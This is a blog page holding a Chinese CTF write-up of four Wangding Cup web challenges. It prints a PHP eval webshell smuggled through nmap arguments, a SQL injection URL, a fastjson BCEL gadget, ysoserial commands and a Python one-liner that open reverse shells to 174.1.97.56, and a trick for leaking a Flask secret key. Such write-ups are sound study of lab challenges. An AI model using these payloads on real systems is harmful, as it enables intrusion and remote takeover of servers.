<!DOCTYPE html>
<html lang="en">
  <head>
    
<meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width,user-scalable=no,initial-scale=1,minimum-scale=1,maximum-scale=1">


<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />



  <meta name="description" content="网鼎杯-wp2"/>




  <meta name="keywords" content="wp," />





  <link rel="alternate" href="/atom.xml" title="glotozz'blog">




  <link rel="shortcut icon" type="image/x-icon" href="/favicon.ico?v=1.1" />



<link rel="canonical" href="https://glotozz.github.io/2020/05/18/网鼎杯-wp2/"/>


<meta property="og:type" content="article">
<meta property="og:title" content="网鼎杯-wp2">
<meta property="og:url" content="https://glotozz.github.io/2020/05/18/%E7%BD%91%E9%BC%8E%E6%9D%AF-wp2/index.html">
<meta property="og:site_name" content="glotozz&#39;blog">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://i.loli.net/2020/05/19/oclPwaYOzKjdAnQ.png">
<meta property="og:image" content="https://i.loli.net/2020/05/19/lqNPZnscXkCA2Tt.png">
<meta property="og:image" content="https://i.loli.net/2020/05/19/E4CxaGLpO6DRu2i.png">
<meta property="og:image" content="https://i.loli.net/2020/05/19/jqkFL2RE3D7aBsy.png">
<meta property="og:image" content="https://i.loli.net/2020/05/19/xaX2A9TKkqU7nMY.png">
<meta property="og:image" content="https://i.loli.net/2020/05/19/4axPnmjBIe8WHFN.png">
<meta property="og:image" content="https://i.loli.net/2020/05/19/1Gn5APKVsaUZ9jg.png">
<meta property="og:image" content="https://i.loli.net/2020/05/19/LYXpra73oQVhUTO.png">
<meta property="og:image" content="https://i.loli.net/2020/05/19/LDvE39qOIeWyTBz.png">
<meta property="og:image" content="https://i.loli.net/2020/05/19/4NrDeEsybvBMU8n.png">
<meta property="article:published_time" content="2020-05-18T12:25:36.000Z">
<meta property="article:modified_time" content="2020-05-19T11:46:44.721Z">
<meta property="article:author" content="glotozz">
<meta property="article:tag" content="wp">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://i.loli.net/2020/05/19/oclPwaYOzKjdAnQ.png">


<link rel="stylesheet" type="text/css" href="/css/style.css?v=1.1" />
<link href='https://fonts.googleapis.com/css?family=Open+Sans' rel='stylesheet'>





<script type="text/javascript">
  var themeConfig = {
    fancybox: {
      enable: false
    },
  };
</script>




  


<!--<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=0 height=0 src="https://music.163.com/song/media/outer/url?id=28592088.mp3"></iframe>--!>
<!--<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=0 height=0 src="/57a2_fa12_13ff_c310c1889d0f14b24334ad7afef6b9b1.mp3"></iframe>--!>
<!--<iframe frameborder="no" border="0" marginwidth="0" marginheight="0" width=0 height=0 src="https://music.163.com/outchain/player?type=2&id=574288806&auto=0&height=66"></iframe>--!>
    <title> 网鼎杯-wp2 - glotozz'blog </title>
  <meta name="generator" content="Hexo 4.2.0"><link rel="alternate" href="/atom.xml" title="glotozz'blog" type="application/atom+xml">
</head>

  <body>
    <div id="page">
      <header id="masthead"><div class="site-header-inner">
    <h1 class="site-title">
        <a href="/." class="logo">glotozz'blog</a>
    </h1>

    <nav id="nav-top">
        
            <ul id="menu-top" class="nav-top-items">
                
                    <li class="menu-item">
                        <a href="/archives">
                            
                            
                                Archives
                            
                        </a>
                    </li>
                
                    <li class="menu-item">
                        <a href="/about">
                            
                            
                                About
                            
                        </a>
                    </li>
                
                    <li class="menu-item">
                        <a href="/read">
                            
                            
                                Read
                            
                        </a>
                    </li>
                
                    <li class="menu-item">
                        <a href="/stars">
                            
                            
                                Stars
                            
                        </a>
                    </li>
                
            </ul>
        
  </nav>
</div>

      </header>
      <div id="content">
        
    <div id="primary">
        
  <article class="post">
    <header class="post-header">
      <h1 class="post-title">
        
          网鼎杯-wp2
        
      </h1>

      <time class="post-time">
          May 18 2020
      </time>
    </header>



    
            <div class="post-content">
            <meta name="referrer" content="no-referrer">
<a id="more"></a>

<p> &nbsp;  &nbsp; &nbsp;&nbsp;&nbsp;<strong>简陋的目录</strong></p>
<!-- toc -->

<ul>
<li><a href="#nmap">nmap</a></li>
<li><a href="#phpweb">PHPWEB</a></li>
<li><a href="#think-java">Think Java</a></li>
<li><a href="#picdown">PicDown</a></li>
<li><a href="#参考链接">参考链接</a></li>
</ul>
<!-- tocstop -->

<hr>
<p>挖src有些自闭，补做下网鼎杯另外两组中的题。</p>
<h3><span id="nmap">nmap</span></h3><p>考nmap语法</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">nmap -iL ip.txt -oN res.txt</span><br><span class="line">&#x3D;&gt;注意前后的拼接</span><br><span class="line">127.0.0.1&#39; -iL &#x2F;flag -oN res.txt &#39;</span><br></pre></td></tr></table></figure>

<p>打了一发，没拿到flag。。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">&#39;&lt;?php eval($_POST[&quot;a&quot;]);?&gt; -oG hack.php &#39;</span><br><span class="line">&#x3D;&gt;过滤了php</span><br><span class="line">#测试失败</span><br><span class="line">&#39;&lt;?&#x3D; @eval($_POST[&quot;a&quot;]);?&gt; -oG ccc.phtml&#39;</span><br><span class="line">#测试成功，需要在最后的单引号前多个空格。。。上面读取&#x2F;flag没成功的原因也是这个</span><br><span class="line">&#39;&lt;?&#x3D; @eval($_POST[&quot;pd&quot;]);?&gt; -oG pd.phtml &#39;</span><br></pre></td></tr></table></figure>

<p>常见的类似的还有wget、curl等</p>
<hr>
<h3><span id="phpweb">PHPWEB</span></h3><p>简单的反序列化，或者利用<code>\system</code>绕过黑名单，前面的<code>\</code>表示命名空间，这个操作其实以前也见过</p>
<h3><span id="think-java">Think Java</span></h3><p>给了附件，sqldict中存在明显的sql注入</p>
<p><code>SqlDict.class</code>中的<code>getTableData()</code></p>
<p><img src="https://i.loli.net/2020/05/19/oclPwaYOzKjdAnQ.png" alt="Snipaste_2020-05-18_23-23-11.png"></p>
<p><img src="https://i.loli.net/2020/05/19/lqNPZnscXkCA2Tt.png" alt="Snipaste_2020-05-18_21-58-58.png"></p>
<p>构造sql注入</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">myapp?useUnicode&#x3D;true&#39;union&#x2F;**&#x2F;select&#x2F;**&#x2F;group_concat(SCHEMA_NAME)from(information_schema.schemata)#</span><br></pre></td></tr></table></figure>

<p>得到管理员账户密码<code>admin/admin@Rrrr_ctf_asde</code>但是这里的flag不在数据库中，发现<code>Test.class</code>中有个可疑的类</p>
<p><img src="https://i.loli.net/2020/05/19/E4CxaGLpO6DRu2i.png" alt="Snipaste_2020-05-18_23-24-52.png"></p>
<p>访问</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http:&#x2F;&#x2F;0b36927b-b302-4d2b-9fbf-d66e615b5485.node3.buuoj.cn&#x2F;swagger-ui.html</span><br></pre></td></tr></table></figure>

<p>存在swagger未授权访问接口，说来也巧，前两天看src捡漏刚好看过这个。。。</p>
<p>但是进一步利用的文章似乎没有。。</p>
<p>没用过这个项目，根据参数传递盲猜是json反序列化</p>
<p><img src="https://i.loli.net/2020/05/19/jqkFL2RE3D7aBsy.png" alt="Snipaste_2020-05-18_23-37-03.png"></p>
<p>不知道后端代码，试试常见的fastjson反序列化和jackjson反序列化漏洞+CC5这条链</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&#123;</span><br><span class="line">  &quot;@type&quot; : &quot;org.apache.tomcat.dbcp.dbcp.BasicDataSource&quot;,</span><br><span class="line">  &quot;driverClassLoader&quot; :</span><br><span class="line">  &#123;</span><br><span class="line">    &quot;@type&quot;:&quot;com.sun.org.apache.bcel.internal.util.ClassLoader&quot;</span><br><span class="line">  &#125;,</span><br><span class="line">  &quot;driverClassName&quot; : &quot;$$BCEL$$+CC5&quot;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar ysoserial.jar  CommonsCollections5 &quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzQuMS45Ni4yMzMvMTIzNCAwPiYx&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot; &gt; poc.ser</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">Path path &#x3D; Paths.get(&quot;poc.txt&quot;);</span><br><span class="line">byte[] data &#x3D; Files.readAllBytes(path);</span><br><span class="line">&#x2F;&#x2F;BCEL编码</span><br><span class="line">String s &#x3D;  Utility.encode(data,true);</span><br><span class="line">System.out.print(s);</span><br></pre></td></tr></table></figure>

<p>打了一发没成功。。。</p>
<p>==============感觉信息有点少，未完待续</p>
<p>看了下wp，利用之前数据库注出来的账户密码<code>admin/admin@Rrrr_ctf_asde</code></p>
<p>登录得到token</p>
<p><img src="https://i.loli.net/2020/05/19/xaX2A9TKkqU7nMY.png" alt="Snipaste_2020-05-19_08-06-56.png"></p>
<p>将token放入<code>/common/user/current</code>可正常登录</p>
<p>对token进行分析</p>
<p><img src="https://i.loli.net/2020/05/19/4axPnmjBIe8WHFN.png" alt="Snipaste_2020-05-19_08-07-40.png"></p>
<p>base64解码后是一个类的序列化文件，存在反序列化</p>
<blockquote>
<p>一段数据以<code>rO0AB</code>开头，你基本可以确定这串就是JAVA序列化base64加密的数据。</p>
<p>或者如果以<code>aced</code>开头，那么他就是这一段java序列化的16进制。</p>
</blockquote>
<p>那么ysoserial一把梭即可，先试试CC5</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">bash -i &gt;&amp; &#x2F;dev&#x2F;tcp&#x2F;174.1.97.56&#x2F;1234 0&gt;&amp;1</span><br><span class="line">&#x3D;&gt;</span><br><span class="line">bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzQuMS45Ny41Ni8xMjM0IDA+JjE&#x3D;&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;</span><br><span class="line">&#x3D;&gt;</span><br><span class="line">java -jar ysoserial.jar  CommonsCollections5 &quot;bash -c &#123;echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzQuMS45Ny41Ni8xMjM0IDA+JjE&#x3D;&#125;|&#123;base64,-d&#125;|&#123;bash,-i&#125;&quot; |base64 -w 0</span><br></pre></td></tr></table></figure>

<p>没成功，使用<code>ROME</code> payload成功</p>
<hr>
<h3><span id="picdown">PicDown</span></h3><p>存在任意文件读取</p>
<p><img src="https://i.loli.net/2020/05/19/1Gn5APKVsaUZ9jg.png" alt="Snipaste_2020-05-19_08-34-25.png"></p>
<p>读取<code>/start.sh</code></p>
<p><img src="https://i.loli.net/2020/05/19/LYXpra73oQVhUTO.png" alt="Snipaste_2020-05-19_08-36-28.png"></p>
<p>读取<code>app.py</code></p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask, Response</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> render_template</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> os</span><br><span class="line"><span class="keyword">import</span> urllib</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line">SECRET_FILE = <span class="string">"/tmp/secret.txt"</span></span><br><span class="line">f = open(SECRET_FILE)</span><br><span class="line">SECRET_KEY = f.read().strip()</span><br><span class="line">os.remove(SECRET_FILE)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">index</span><span class="params">()</span>:</span></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">'search.html'</span>)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/page')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">page</span><span class="params">()</span>:</span></span><br><span class="line">    url = request.args.get(<span class="string">"url"</span>)</span><br><span class="line">    <span class="keyword">try</span>:</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> url.lower().startswith(<span class="string">"file"</span>):</span><br><span class="line">            res = urllib.urlopen(url)</span><br><span class="line">            value = res.read()</span><br><span class="line">            response = Response(value, mimetype=<span class="string">'application/octet-stream'</span>)</span><br><span class="line">            response.headers[<span class="string">'Content-Disposition'</span>] = <span class="string">'attachment; filename=beautiful.jpg'</span></span><br><span class="line">            <span class="keyword">return</span> response</span><br><span class="line">        <span class="keyword">else</span>:</span><br><span class="line">            value = <span class="string">"HACK ERROR!"</span></span><br><span class="line">    <span class="keyword">except</span>:</span><br><span class="line">        value = <span class="string">"SOMETHING WRONG!"</span></span><br><span class="line">    <span class="keyword">return</span> render_template(<span class="string">'search.html'</span>, res=value)</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route('/no_one_know_the_manager')</span></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">manager</span><span class="params">()</span>:</span></span><br><span class="line">    key = request.args.get(<span class="string">"key"</span>)</span><br><span class="line">    print(SECRET_KEY)</span><br><span class="line">    <span class="keyword">if</span> key == SECRET_KEY:</span><br><span class="line">        shell = request.args.get(<span class="string">"shell"</span>)</span><br><span class="line">        os.system(shell)</span><br><span class="line">        res = <span class="string">"ok"</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        res = <span class="string">"Wrong Key!"</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> res</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__ == <span class="string">'__main__'</span>:</span><br><span class="line">    app.run(host=<span class="string">'0.0.0.0'</span>, port=<span class="number">8080</span>)</span><br></pre></td></tr></table></figure>

<p>读取下<code>templates/search.html</code></p>
<p><img src="https://i.loli.net/2020/05/19/LDvE39qOIeWyTBz.png" alt="Snipaste_2020-05-19_09-12-04.png"></p>
<p><code>/page</code>不存在模版注入，之前回显的文件内容是通过<code>Response(value, mimetype=&#39;application/octet-stream&#39;)</code></p>
<p><code>/no_one_know_the_manager</code>需要知道<code>SECRET_KEY</code>，前面通过<code>popen</code>打开文件，会创建文件描述符，读取</p>
<p><img src="https://i.loli.net/2020/05/19/4NrDeEsybvBMU8n.png" alt="Snipaste_2020-05-19_09-00-30.png"></p>
<p>反弹shell，bash反弹失败</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzQuMS45Ni4yMzMvMTIzNCAwPiYx|base64 -d|bash</span><br></pre></td></tr></table></figure>

<p>python反弹shell</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &#39;import socket,subprocess,os;s&#x3D;socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;174.1.97.56&quot;,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p&#x3D;subprocess.call([&quot;&#x2F;bin&#x2F;sh&quot;,&quot;-i&quot;]);&#39;</span><br></pre></td></tr></table></figure>

<p>成功</p>
<hr>
<h3><span id="参考链接">参考链接</span></h3><p> <a href="https://www.cnblogs.com/h3zh1/p/12914439.html" target="_blank" rel="noopener">https://www.cnblogs.com/h3zh1/p/12914439.html</a></p>

            </div>
          

    
      <footer class="post-footer">

        
         <div>    
          
          <ul class="post-copyright">
             <li class="post-copyright-link">
              <strong>本文作者：</strong>
              <a href="/" title="欢迎访问 glotozz 的个人博客">glotozz</a>
            </li>

            <li class="post-copyright-license">
              <strong>版权声明： </strong>
               本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明出处！
            </li>
          </ul>
        
      </div>
      
        <div class="post-tags">
          
            <a href="/tags/wp/" rel="tag"><i class="fa fa-tag"></i> wp</a>
          
        </div>
      

        
        
  <nav class="post-nav">
    
      <a class="prev" href="/2020/05/19/vulstack-3/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">vulstack-3</span>
        <span class="prev-text nav-mobile">Prev</span>
      </a>
    
    
      <a class="next" href="/2020/05/17/%E8%AE%B0%E4%B8%80%E6%AC%A1SRC%E6%8C%96%E6%B4%9E/">
        <span class="next-text nav-default">记一次SRC挖洞</span>
        <span class="prev-text nav-mobile">Next</span>
        <i class="iconfont icon-right"></i>
      </a>
    
  </nav>

        
  <div class="comments" id="comments">
    
      <div id="vcomments"></div>
    
  </div>


      </footer>
    
  </article>

    </div>

      </div>

      <footer id="colophon">
<span class="copyright-year">
    
        &copy;
    
    2020
    <span class="footer-author">glotozz.</span>
    <span class="power-by">
        Powered by <a class="hexo-link" href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> and <a class="theme-link" href="https://github.com/frostfan/hexo-theme-polarbear" target="_blank" rel="noopener">Polar Bear</a>
    </span>
</span>

      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>
    



  
<!-- valine Comments -->
<script src="//cdn1.lncld.net/static/js/3.0.4/av-min.js"></script>
<script src="//cdn.jsdelivr.net/gh/xcss/valine@v1.1.7/dist/Valine.min.js"></script>
<script type="text/javascript">
    new Valine({
        el: '#vcomments',
        notify: false,
        verify: false,
        app_id: "d2XJ52o9D5xTnDd2J92VPPna-gzGzoHsz",
        app_key: "P6wHC0f6Fn02hW8SSdnax8wa",
        placeholder: "Just go go",
        avatar: 'mm'
    });
</script>


    




  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  

    <script type="text/javascript" src="/js/src/theme.js?v=1.1"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=1.1"></script>

    <!-- 代码块复制功能 -->
  <script type="text/javascript" src="/js/src/clipboard.min.js"></script>  
  <script type="text/javascript" src="/js/src/clipboard-use.js"></script>
  </body>
</html>
